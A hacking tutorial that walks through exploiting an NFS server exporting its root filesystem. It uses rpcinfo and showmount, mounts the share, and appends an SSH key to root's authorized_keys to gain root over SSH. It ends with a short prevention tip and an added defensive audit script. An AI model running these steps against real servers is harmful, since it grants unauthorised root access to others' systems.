Exploit a Misconfigured NFS Server | SSH | RPCbind

What is an NFS Server?

NFS (Network File System) is a client-server system that allows a client to access shared files over a network. It lets a client mount the directories the server shares. We are going to access a file system and add our SSH public key to the authorized_keys file to gain root access via SSH. At the end I will explain how to prevent this type of attack on your server.

Let the victim IP be 192.168.43.176

Open a terminal and type rpcinfo -p 192.168.43.176; this will return all the registered RPC programs.

Many people get the error that the rpcinfo command is not found. In that case, install it with: sudo apt update && sudo apt install rpcbind

Type sudo showmount -e 192.168.43.176; this will return the directories available for mounting.

The output / * means the root directory.

Now create a temporary directory to use as the mount point: mkdir /tmp/dir

Then mount the NFS server on the temporary directory: mount -o nolock -t nfs 192.168.43.176:/ /tmp/dir

Now generate an SSH key with the command ssh-keygen. This will create a key pair: the private key in /home/h0nk3r/.ssh/id_rsa and the public key in /home/h0nk3r/.ssh/id_rsa.pub

Now import the public key: cat /home/h0nk3r/.ssh/id_rsa.pub >> /tmp/dir/root/.ssh/authorized_keys

This appends your SSH public key to root's authorized_keys file on the NFS server, which gives you access to root via SSH. Now just unmount the shared directory: umount /tmp/dir

Now you can connect directly to the server with the command ssh root@192.168.43.176

Prevention:

As the owner of the server, manage users with groups and specific privileges, and never use the root directory as the mount point.
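
One way to check a server for the misconfiguration described above, as an added example that is not part of the original post: a Python script that audits text in /etc/exports syntax for root-directory exports, any-client (*) entries and no_root_squash. The sample exports, the issue names and the function audit_exports are assumptions made for illustration, and only the common host(options) form is handled.

```python
import re

# Constructed sample in /etc/exports syntax (not taken from the page's server).
SAMPLE_EXPORTS = """\
# weak: whole filesystem, any client, client root stays root
/           *(rw,sync,no_root_squash)
# tighter: one data directory, one subnet, root squashed
/srv/share  192.168.43.0/24(rw,sync,root_squash)
/srv/pub    (ro,sync)
/home       192.168.43.10(rw,no_root_squash) *(ro)
"""

CLIENT = re.compile(r"([^\s()]*)(?:\(([^)]*)\))?")  # host(opt,opt,...)


def audit_exports(text):
    """Return sorted (path, client, issue) tuples for risky export entries."""
    findings = set()
    # Join backslash-continued lines, then strip comments and blank lines.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for token in clients:
            m = CLIENT.fullmatch(token)
            if m is None:
                findings.add((path, token, "unparsed-entry"))
                continue
            host = m.group(1) or "*"  # "(opts)" with no host means any client
            opts = set((m.group(2) or "").split(","))
            if path == "/":
                findings.add((path, host, "root-export"))
            if host == "*":
                findings.add((path, host, "any-client"))
                if "rw" in opts:
                    findings.add((path, host, "world-writable"))
            # Without root squashing, uid 0 on the client is uid 0 on the
            # export, so it can write files such as /root/.ssh/authorized_keys.
            if "no_root_squash" in opts:
                findings.add((path, host, "no-root-squash"))
    return sorted(findings)


if __name__ == "__main__":
    for path, host, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:12} {host:18} {issue}")
```

To audit a real server, pass the contents of its /etc/exports file to audit_exports instead of the constructed sample.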

Conclusion

Sorry if I made any conceptual or grammatical mistakes, as I am not good at English.
Hope you had a nice read, coming back to hacknews.